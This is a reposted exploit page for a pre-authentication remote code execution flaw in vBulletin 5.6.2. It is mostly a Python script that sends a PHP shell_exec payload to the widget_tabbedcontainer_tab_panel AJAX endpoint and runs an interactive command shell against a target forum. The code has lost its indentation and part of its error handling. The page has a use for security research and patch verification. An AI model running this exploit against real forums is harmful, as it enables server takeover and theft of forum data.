Vbulletin 5.6.2 widget_tabbedcontainer_tab_panel remote code execution Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2020-08-12 | Type : webapps | Platform : php
This exploit / vulnerability Vbulletin 5.6.2 widget_tabbedcontainer_tab_panel remote code execution is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
# Date: 2020-08-09
# Exploit Author: @zenofex
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: None
# Version: 5.4.5 through 5.6.2
# Tested on: vBulletin 5.6.2 on Ubuntu 19.04
# CVE : None

# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code
# execution vulnerability caused by incomplete patching of the previous
# "CVE-2019-16759" RCE. This logic bug allows for a single pre-auth
# request to execute PHP code on a target vBulletin forum.

#More info can be found at:

#!/usr/bin/env python3
# vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex

import argparse
import requests
import sys

def run_exploit(vb_loc, shell_cmd):
post_data = {'subWidgets[0][template]' : 'widget_php', 'subWidgets[0][config][code]' : "echo shell_exec('%s'); exit;" % shell_cmd}
r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)
return r.text

ap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')
ap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')
ARGS = ap.parse_args()

while True:
cmd = input("vBulletin5$ ")
print(run_exploit(ARGS.location, cmd))
except KeyboardInterrupt:
sys.exit("\nClosing shell...")
except Exception as e: